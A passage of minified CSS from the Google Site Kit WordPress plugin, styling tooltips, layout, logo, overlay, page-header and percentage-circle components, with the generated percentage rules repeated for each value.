.mdc-image-radio__content--no-image::after{content:unset}.googlesitekit-plugin .googlesitekit-image-radio .image-radio.mdc-ripple-upgraded--background-focused .mdc-image-radio__content,.googlesitekit-plugin .googlesitekit-image-radio .image-radio.mdc-ripple-upgraded--foreground-activation .mdc-image-radio__content{position:relative}.googlesitekit-plugin .googlesitekit-image-radio .image-radio.mdc-ripple-upgraded--background-focused .mdc-image-radio__content::after,.googlesitekit-plugin .googlesitekit-image-radio .image-radio.mdc-ripple-upgraded--foreground-activation .mdc-image-radio__content::after{background-color:rgba(0,34,13,.32);border-radius:.5625rem;content:"";height:100%;opacity:1;position:absolute;width:100%}.googlesitekit-plugin .googlesitekit-image-radio .image-radio.mdc-ripple-upgraded--foreground-activation .mdc-image-radio__content--no-image{background-color:rgba(0,34,13,.32)}.googlesitekit-plugin .googlesitekit-image-radio .image-radio.mdc-ripple-upgraded--foreground-activation .mdc-image-radio__content--no-image::after{content:unset}.googlesitekit-tooltip.MuiTooltip-tooltip.googlesitekit-info-tooltip__content{border-radius:8px;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-weight:400;letter-spacing:.2px;line-height:1.33;max-width:160px;padding:12px}.googlesitekit-tooltip.MuiTooltip-tooltip.googlesitekit-info-tooltip__content>button{background:none;border:none;padding-right:0}.googlesitekit-tooltip.MuiTooltip-tooltip.googlesitekit-info-tooltip__content>a,.googlesitekit-tooltip.MuiTooltip-tooltip.googlesitekit-info-tooltip__content>button{color:#ebeef0;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-layout{background:#fff}.googlesitekit-layout .googlesitekit-layout__header{border-bottom:1px solid #ebeef0;font-size:16px;letter-spacing:.5px}.googlesitekit-layout .googlesitekit-layout__header-title{align-items:center;display:flex;gap:16px;margin:0}.googlesitekit-layout .googlesitekit-layout__footer{border-top:1px solid #ebeef0;font-size:12px;letter-spacing:.2px}.googlesitekit-layout.googlesitekit-layout--transparent{background-color:transparent}.googlesitekit-layout.googlesitekit-layout--rounded{border-radius:24px}.googlesitekit-layout--fill{display:flex;flex-direction:column;height:100%}.googlesitekit-layout--fill>*{flex:1 1 auto;width:100%}.googlesitekit-layout--fill .googlesitekit-layout__header{flex:0 0 auto}.googlesitekit-layout--fill .googlesitekit-layout__footer{flex:0 0 auto}.googlesitekit-layout--relative{position:relative}.googlesitekit-logo{color:#5f6561;line-height:0}.googlesitekit-logo .googlesitekit-logo__logo-g,.googlesitekit-logo .googlesitekit-svg-logo-g{height:24px;vertical-align:middle;width:23px}@media(min-width: 600px){.googlesitekit-logo .googlesitekit-logo__logo-g,.googlesitekit-logo .googlesitekit-svg-logo-g{height:34px;width:32px}}.googlesitekit-logo .googlesitekit-logo__logo-sitekit,.googlesitekit-logo .googlesitekit-svg-logo-sitekit{fill:currentColor;height:16px;margin-left:8px;vertical-align:middle;width:61px}@media(min-width: 600px){.googlesitekit-logo .googlesitekit-logo__logo-sitekit,.googlesitekit-logo .googlesitekit-svg-logo-sitekit{height:26px;margin-left:16px;width:99px}}@media(max-width: 449px){.googlesitekit-logo .googlesitekit-logo__logo-sitekit,.googlesitekit-logo .googlesitekit-svg-logo-sitekit{display:none}}.googlesitekit-logo--mini .googlesitekit-logo__logo-g,.googlesitekit-logo--mini .googlesitekit-svg-logo-g{height:19px;width:19px}.googlesitekit-logo--mini .googlesitekit-logo__logo-sitekit,.googlesitekit-logo--mini .googlesitekit-svg-logo-sitekit{height:17px;margin-left:4px;width:78px}.googlesitekit-mini-chart{margin-left:16px;width:28px}.googlesitekit-module-outro{background-color:#fff;padding:45px 0;text-align:center}@media(min-width: 600px){.googlesitekit-module-outro{padding:45px}}.googlesitekit-module-outro .googlesitekit-module-outro__logo{align-items:center;display:inline-flex}.googlesitekit-module-outro .googlesitekit-module-outro__logo>svg{margin:0 8px}@media(min-width: 960px){.googlesitekit-module-outro .googlesitekit-module-outro__logo>svg{margin:0 12px}}.googlesitekit-module-outro .googlesitekit-module-outro__title{margin:20px auto 25px;max-width:600px}.googlesitekit-module-page{padding-bottom:10px;padding-top:10px}@media(min-width: 600px){.googlesitekit-module-page{padding-left:10px;padding-right:10px}}.googlesitekit-module-recovery-errors{color:#ac4220}.googlesitekit-module-recovery-errors ul{list-style:disc;list-style-position:inside}.googlesitekit-new-badge{background-color:#573195;color:#fff;margin-left:6px;text-transform:none}.googlesitekit-new-badge.googlesitekit-new-badge--has-no-spacing{margin-left:0}.googlesitekit-new-badge.googlesitekit-badge--has-left-spacing{margin-left:12px}.googlesitekit-tooltip.MuiTooltip-tooltip.googlesitekit-new-badge__tooltip{border-radius:8px;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-weight:400;letter-spacing:.2px;line-height:1.33;max-width:160px;padding:12px}.googlesitekit-tooltip.MuiTooltip-tooltip.googlesitekit-new-badge__tooltip>a{color:#ebeef0;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-noscript{background-color:#fff;margin:5px 20px 5px 0}@media(min-width: 600px){.googlesitekit-noscript{padding-left:10px;padding-right:10px}}.googlesitekit-noscript__title{margin:0}.no-js:not([amp-version]) [id^=js-googlesitekit-]{display:none}.googlesitekit-opt-in{position:relative}.googlesitekit-opt-in .mdc-form-field{position:relative}.googlesitekit-opt-in .mdc-form-field label{font-size:12px;letter-spacing:.2px;line-height:1.33}@media(min-width: 960px){.googlesitekit-opt-in span{display:block}}.googlesitekit-opt-in--border{border-top:1px solid #b8bdb9;padding-top:16px}@media(min-width: 960px){.googlesitekit-opt-in--border{padding-top:24px}}.googlesitekit-opt-in--align-top .mdc-form-field{align-items:flex-start}.googlesitekit-opt-in--align-top .mdc-checkbox{margin-top:-7px}.googlesitekit-overlay{align-items:center;background:rgba(235,238,240,.8);bottom:0;cursor:not-allowed;display:flex;height:100%;justify-content:center;left:0;position:absolute;right:0;top:0;width:100%;z-index:10}.googlesitekit-overlay .googlesitekit-overlay__icon{align-items:center;background:#ebeef0;border-radius:50%;display:flex;height:60px;justify-content:center;margin:0 auto;width:60px}.googlesitekit-overlay .googlesitekit-overlay__icon svg{color:#333935}.googlesitekit-overlay .googlesitekit-overlay__title{margin-bottom:0;padding:0 16px;text-align:center}.googlesitekit-overlay--compress .googlesitekit-overlay__wrapper{align-items:center;display:flex}.googlesitekit-overlay--compress .googlesitekit-overlay__icon{height:40px;width:40px}.googlesitekit-overlay--compress .googlesitekit-overlay__icon .svg{height:20px;width:auto}.googlesitekit-overlay--compress .googlesitekit-overlay__title{margin-top:0;padding-right:0}.googlesitekit-page{margin-left:-10px}@media(min-width: 783px){.googlesitekit-page{margin-left:-20px}}#wpbody-content>div:not(#screen-meta)+.googlesitekit-plugin>.googlesitekit-page,#wpbody-content>div:not(#screen-meta)+script+.googlesitekit-plugin>.googlesitekit-page{margin-top:25px}.googlesitekit-page .googlesitekit-page-content,.googlesitekit-page .googlesitekit-module-page,.googlesitekit-page .googlesitekit-setup{margin:0 auto;max-width:1366px}.googlesitekit-pagespeed-widget header{display:flex;justify-content:space-between}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__data-src-tabs{display:flex}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__refreshing-progress-bar-wrapper{margin-top:-4px}.googlesitekit-pagespeed-widget__refreshing{filter:grayscale(1);opacity:.5}.googlesitekit-page-footer{display:flex;justify-content:flex-end;margin:0}.googlesitekit-page-header{margin:0}.googlesitekit-page-header .googlesitekit-page-header__title{display:inline-block;margin:0 0 -2px;padding:0;vertical-align:middle}.googlesitekit-page-header .googlesitekit-page-header__icon+.googlesitekit-page-header__title{margin-left:8px}.googlesitekit-page-header .googlesitekit-page-header__icon{vertical-align:middle}.googlesitekit-page-header .googlesitekit-page-header__details{align-items:center;display:flex;justify-content:space-between}@media(min-width: 600px){.googlesitekit-page-header .googlesitekit-page-header__details{justify-content:flex-end}}.googlesitekit-page-header .googlesitekit-page-header__status{align-items:center;display:flex;font-size:12px;letter-spacing:.2px;line-height:1;margin:0}.googlesitekit-page-header .googlesitekit-page-header__status .googlesitekit-icon-wrapper{align-items:center;border-radius:50%;display:flex;height:19px;justify-content:center;margin-left:8px;width:19px}.googlesitekit-page-header .googlesitekit-page-header__status--connected .googlesitekit-icon-wrapper{background-color:#46732b;color:#fff}.googlesitekit-page-header .googlesitekit-page-header__status--not-connected .googlesitekit-icon-wrapper{background-color:#895a00;color:#fff}.googlesitekit-page-header .googlesitekit-page-header__status+.googlesitekit-page-header__range{margin-left:16px;margin-top:-3px}@media(min-width: 960px){.googlesitekit-page-header .googlesitekit-page-header__status+.googlesitekit-page-header__range{margin-left:24px}}.googlesitekit-percentage-circle{background-color:#ebeef0;border-radius:50%;font-size:28px;height:1em;margin:0 auto;position:relative;width:1em}.googlesitekit-percentage-circle::after{background-color:#fff;border-radius:50%;box-sizing:content-box;content:"";display:block;height:.8em;left:.1em;position:absolute;top:.1em;width:.8em}.googlesitekit-percentage-circle .googlesitekit-percentage-circle__text{box-sizing:content-box;font-size:18px;font-weight:700;left:0;line-height:50px;position:absolute;text-align:center;top:0;width:50px;z-index:1}.googlesitekit-percentage-circle .googlesitekit-percentage-circle__slice{box-sizing:content-box;clip:rect(0, 1em, 1em, 0.5em);height:1em;position:absolute;width:1em}.googlesitekit-percentage-circle .googlesitekit-percentage-circle__bar{border:.1em solid transparent;border-radius:50%;box-sizing:content-box;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(0deg);width:.8em}.googlesitekit-percentage-circle .googlesitekit-percentage-circle__fill{box-sizing:content-box}.googlesitekit-percentage-circle--fast{color:#46732b}.googlesitekit-percentage-circle--average{color:#895a00}.googlesitekit-percentage-circle--slow{color:#ac4220}.googlesitekit-percentage-circle--percent-51 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-51 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-51 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-52 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-52 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-52 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-53 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-53 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-53 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-54 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-54 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-54 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-55 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-55 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-55 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-56 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-56 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-56 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-57 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-57 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-57 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-58 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-58 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-58 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-59 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-59 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-59 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-60 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-60 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-60 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-61 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-61 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-61 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-62 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-62 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-62 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-63 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-63 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-63 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-64 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-64 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-64 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-65 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-65 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-65 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-66 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-66 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-66 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-67 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-67 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-67 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-68 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-68 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-68 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-69 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-69 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-69 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-70 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-70 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-70 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-71 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-71 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-71 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-72 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-72 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-72 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-73 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-73 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-73 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-74 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-74 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-74 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-75 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-75 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-75 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-76 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-76 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-76 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-77 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-77 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-77 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-78 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-78 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-78 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-79 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-79 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-79 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-80 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-80 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-80 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-81 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-81 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-81 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-82 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-82 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-82 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-83 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-83 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-83 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-84 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-84 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-84 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-85 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-85 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-85 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-86 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-86 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-86 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-87 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-87 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-87 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-88 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-88 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-88 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-89 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-89 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-89 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-90 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-90 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-90 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-91 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-91 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-91 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-92 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-92 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-92 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-93 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-93 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-93 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-94 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-94 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-94 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-95 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-95 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-95 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-96 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-96 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-96 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-97 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-97 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-97 